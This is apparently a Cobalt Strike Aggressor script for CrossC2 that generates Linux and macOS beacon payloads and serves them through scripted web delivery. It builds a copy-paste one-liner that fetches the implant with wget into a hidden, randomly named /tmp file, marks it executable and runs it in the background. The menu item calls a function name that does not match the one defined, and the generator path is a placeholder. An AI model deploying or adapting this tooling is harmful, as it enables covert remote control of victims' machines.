menubar("CrossC2", "generator", 2);

popup generator {
    menu "&CrossC2 Payload Generator" {
        item "&genCrossC2" {
            genCrossC2()
        }
    }
    item "&About" {
        projectAbout()
    }
}

sub random_string {
    # <3 @offsec_ginger
    $limit = $1;
    @random_str = @();
    $characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    for ($x = 0; $x < $limit; $x++) {
        $n = rand(strlen($characters));
        add(@random_str, charAt($characters, $n));
    }
    return join('', @random_str);
}

sub dialogCallBack {
    $system = $3['system'];
    $arch = $3['arch'];
    $payload_type = $3['payload_type'];
    $listener = $3['listener'];
    $outputFileName = $3['outputFileName'];

    $listener_info = listener_info($listener);
    $host = $listener_info['host'];
    $port = $listener_info['port'];

    $process = exec("/xxx/xx/xx/genCrossC2"." ".$host." ". $port." null null ".$system." ".$arch." ".$outputFileName)
    @data = readAll($process);
    closef($process);

    $handle = openf($outputFileName);
    $c2Data = readb($handle, -1);
    closef($handle);

    $uri = $3['uri'];
    $lport = $3['lport'];

    # host the script
    $url = site_host($host, $lport, $uri, $c2Data, "automatic", "Scripted Web Delivery (wget)"); 

    $targetSaveName = random_string(10);
    $targetSaveName = '.'.$targetSaveName.'';

    # tell the user our URL
    prompt_text("Copy/Paste One-liner: ", "wget " . $url . " -O /tmp/" . $targetSaveName . " && chmod a+x /tmp/" . $targetSaveName . " && /tmp/" . $targetSaveName . "&", {});

    elog("wget " . $url . " -O /tmp/" . $targetSaveName . " && chmod a+x /tmp/" . $targetSaveName . " && /tmp/" . $targetSaveName . "&");
}

sub genCrossC22 {
    $dialog = dialog("CrossC2 Payload Generator", %(uri => "/a", lport => "55413", listener => "Listener: ", system => "System: ", arch => "Arch: ", payload_type => "Payload_Type: ", outputFileName => "/tmp/CrossC2-test"), &dialogCallBack);
    dialog_description($dialog, "Export CrossC2 Payload");
    drow_text($dialog, "uri", "URI Path: ", 20);
    drow_text($dialog, "lport", "Web Delivery Port: ", 20);
    drow_combobox($dialog, "system", "System: ", @("Linux", "MacOS", "Linux-GLIBC"));
    drow_listener($dialog, "listener", "Listener: ");
    drow_combobox($dialog, "arch", "Arch: ", @("x86", "x64"));
    drow_combobox($dialog, "payload_type", "Payload_Type: ", @("Staged", "Stageless"));
    drow_text($dialog, "outputFileName", "OutputFileName: ");
    dbutton_action($dialog, "Build");
    dialog_show($dialog);
}

sub projectAboutCallback {
}

sub projectAbout {
    $dialog = dialog("Cross C2 About",%(link => "https://github.com/gloxec/CrossC2"), &projectAboutCallback);
    dialog_description($dialog, "Export CrossC2 Payload");
    dbutton_action($dialog, "OK");
    drow_text($dialog, "link", "link: ", "");
    dialog_show($dialog);
}

